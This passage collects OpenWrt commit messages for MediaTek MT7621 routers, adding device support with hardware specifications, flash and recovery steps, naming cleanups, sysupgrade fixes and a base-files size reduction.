so is not possible to detect the right rootfs partition.
Because all of this, I preferred to simply use the first pair of
partitions and set read-only the other pair.
However this solution is not optimal because is not possible to know
without opening the case which is the current booted partition.
Let’s take for example a router booting the OEM firmware from the first
pair of partitions. If we flash the OpenWrt image, it will be written
on the second pair. In this situation the router will bootloop 3 times
and then will automatically come back to the first pair of partitions
containg the OEM firmware.
In this situation, to flash OpenWrt correctly is necessary to switch
the booting partition, flashing again the OEM firmware over itself.
At this point the OEM firmware is on both pair of partitions but the
current booted pair is the second one.
Now, flashing the OpenWrt factory image will write the firmware on
the first pair and then will boot correctly.
If this limitation in the ramips platform about the cmdline will be
fixed, the dual boot system can also be implemented in OpenWrt with
almost no effort.
Signed-off-by: Davide Fioravanti <pantanastyle@gmail.com>
Co-Developed-by: Jackson Lim <jackcolentern@gmail.com>
Signed-off-by: Jackson Lim <jackcolentern@gmail.com>
The "proper" vendor prefix for Ubiquiti is "ubnt", this is used in
all targets except ramips and also recommended by the kernel.
This patch adjusts the various board/image/device name variables
accordingly. Since we touch it anyway, this also adds the space
in "EdgeRouter X" as a hyphen to those variables to really make
them consistent with the model name.
While at it, create a real shared definition for the devices in
image/mt7621.mk instead of deriving one device from another.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
I-O DATA WN-AX2033GR is roughly the same as I-O DATA
WN-AX1167GR2. The difference is Wi-Fi feature.
Specification
=============
- SoC: MediaTek MT7621A
- RAM: DDR3 128 MiB
- Flash Memory: NAND 128 MiB (Spansion S34ML01G200TF100)
- Wi-Fi: MediaTek MT7603E
- Wi-Fi: MediaTek MT7615
- Ethernet: 5x 10 Mbps / 100 Mbps / 1000 Mbps (1x WAN, 4x LAN)
- LED: 2x green LED
- Input: 2x tactile switch, 1x slide switch
- Serial console: 57600bps, PCB through hole J5 (Vcc, TX, RX, NC, GND)
- Power: DC 12V
This device only supports channel 1-13 and 36-140.
Thus, narrower frequency limits compared to other devices are required
for limiting wi-fi frequency correctly.
Without this, non-supported frequencies are activated.
Flash instructions
==================
1. Open the router management page (192.168.0.1).
2. Update router firmware using "initramfs-kernel.bin".
3. After updating, run sysupgrade with "sysupgrade.bin".
Recovery instructions
=====================
WN-AX2033GR contains Zyxel Z-LOADER
1. Setup TFTP server (IP address: 10.10.10.3).
2. Put official firmware into TFTP server directory (distribution site:
https://www.iodata.jp/lib/software/w/2068.htm)
3. Connect WX-AX2033GR Ethernet port and computer that runs TFTP server.
4. Connect to serial console.
5. Interrupt booting by Esc key.
6. Flash firmware using "ATNR 1,[firmware filename]" command.
Signed-off-by: Yanase Yuki <dev@zpc.sakura.ne.jp>
[adjust for kernel 5.4, add recovery instructions/frequency comment]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
So far, image/device/board names for Mikrotik devices in mt7621 have
been used quite inconsistently.
This patch harmonizes the naming scheme by applying the same style
as used lately in ath79, i.e. using "RouterBOARD" as separate word
in the model name (instead of RB prefix for the number) and deriving
the board/device name from that (= make lower case and replace spaces
by hyphens).
This style has already been used for most the model/DEVICE_MODEL
variables in mt7621, so this is essentially just adjusting the remaining
variables to that.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This patch adds support for the Netgear R6800, aka Netgear AC1900 and
R6800-100PES.
Specification:
- SoC: MediaTek MT7621AT (880 MHz)
- Flash: 128 MiB NAND
- RAM: 256 MiB
- Wireless: MediaTek MT7615EN b/g/n , MediaTek MT7615EN an+ac
- LAN speed: 10/100/1000
- LAN ports: 4
- WAN speed: 10/100/1000
- WAN ports: 1
- USB 2.0
- USB 3.0
- Serial baud rate of Bootloader and factory firmware: 57600
Known issues:
- Device has 3 wifi LEDs: Wifi 5Ghz, Wifi 2.4Ghz and Wifi on/off.
Wifi on/off is not used.
Installation:
- apply factory image via stock web-gui.
Back to stock:
- nmrpflash can be used to recover to the stock Netgear firmware.
Signed-off-by: Pawel Dembicki <paweldembicki@gmail.com>
The correct model name of WF-2881 is WF2881 without hyphen. The former used
boardnames are not added to SUPPORTED_DEVICES, to make it explicit that the
sysupgrade-tar image, which is newly added in the previous commit, should
not be used to upgrade from older version.
Signed-off-by: Sungbo Eo <mans0n@gorani.run>
[adjust commit title]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
WF-2881 sysupgrade image uses UBI rootfs, but still relies on
default_do_upgrade. Because of this, config backup is not restored after
sysupgrade. It can be fixed by switching to nand_do_upgrade and
sysupgrade-tar image. default_do_upgrade does not handle sysupgrade-tar
properly, so one should use factory image to upgrade from older version.
Signed-off-by: Sungbo Eo <mans0n@gorani.run>
ALFA Network Quad-E4G is a universal Wi-Fi/4G platform, which offers
three miniPCIe (PCIe, USB 2.0, SIM) and a single M.2 B-key (dual-SIM,
USB 3.0) slots, RTC and five Gigabit Ethernet ports with PoE support.
Specification:
- MT7621A (880 MHz)
- 256/512 MB of RAM (DDR3)
- 16/32+ MB of FLASH (SPI NOR)
- optional second SPI flash (8-pin WSON/SOIC)
- 1x microSD (SDXC) flash card reader
- 5x 10/100/100 Mbps Ethernet, with passive PoE support (24 V) in LAN1
- optional 802.3at/af PoE module for WAN
- 3x miniPCIe slot (with PCIe and USB 2.0 buses, micro SIM and 5 V)
- 1x M.2/NGFF B-key 3042 (USB 3.0/2.0, mini + micro SIM)
- RTC (TI BQ32002, I2C bus) with backup battery (CR2032)
- external hardware watchdog (EM Microelectronic EM6324)
- 1x USB 2.0 Type-A
- 1x micro USB Type-B for system serial console (Holtek HT42B534)
- 11x LED (5 for Ethernet, 5 driven by GPIO, 1x power indicator)
- 3x button (reset, user1, user2)
- 1x I2C (4-pin, 2.54 mm pitch) header on PCB
- 4x SIM (6-pin, 2.00 mm pitch) headers on PCB
- 2x UART2/3 (4-pin, 2.54 mm pitch) headers on PCB
- 1x mechanical power switch
- 1x DC jack with lock (24 V)
Other:
- U-Boot selects default SIM slot, based on value of 'default_sim' env
variable: '1' or unset -> SIM1 (mini), '2' -> SIM2 (micro). This board
has additional logic circuit for M.2 SIM switching. The 'sim-select'
will work only if both SIM slots are occupied. Otherwise, always slot
with SIM inside is selected, no matter 'sim-select' value.
- U-Boot enables power in all three miniPCIe and M.2 slots before
loading the kernel
- this board supports 'dual image' feature (controlled by 'dual_image'
U-Boot environment variable)
- all three miniPCIe slots have additional 5 V supply on pins 47 and 49
- the board allows to install up to two oversized miniPCIe cards (vendor
has dedicated MediaTek MT7615N/D cards for this board)
- this board has additional logic circuit controlling PERSTn pins inside
miniPCIe slots. By default, PERSTn (GPIO19) is routed to all miniPCIe
slots but setting GPIO22 to high allows PERSTn control per slot, using
GPIO23-25 (value is inverted)
You can use the 'sysupgrade' image directly in vendor firmware which is
based on OpenWrt (make sure to not preserve settings - use 'sysupgrade
-n -F ...' command). Alternatively, use web recovery mode in U-Boot:
1. Power the device with reset button pressed, the modem LED will start
blinking slowly and after ~3 seconds, when it starts blinking faster,
you can release the button.
2. Setup static IP 192.168.1.2/24 on your PC.
3. Go to 192.168.1.1 in browser and upload 'sysupgrade' image.
Signed-off-by: Piotr Dymacz <pepe2k@gmail.com>
While most of the target's contents are split into subtargets, the
base-files are maintained for the target as a whole.
However, OpenWrt already implements a mechanism that will use (and
even prefer) files in the subtargets' directories. This can be
exploited to make several scripts subtarget-specific and thus save
some space.
In certain cases, keeping files in parent (=target) base-files was
more convenient, and thus no splitting was performed for those.
Note that this will increase overall code lines, but reduce code
per subtarget.
base-files ipk size reduction:
master (mt7621) 60958 B
split (mt7620) 46358 B (- 14.3 kiB)
split (mt7621) 48759 B (- 11.9 kiB)
split (mt76x8) 44948 B (- 15.6 kiB)
split (rt288x) 43508 B (- 17.0 kiB)
split (rt305x) 45616 B (- 15.0 kiB)
split (rt3883) 44176 B (- 16.4 kiB)
Run-tested on:
GL.iNet GL-MT300N-V2 (mt76x8)
D-Link DWR-116 (mt7620)
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>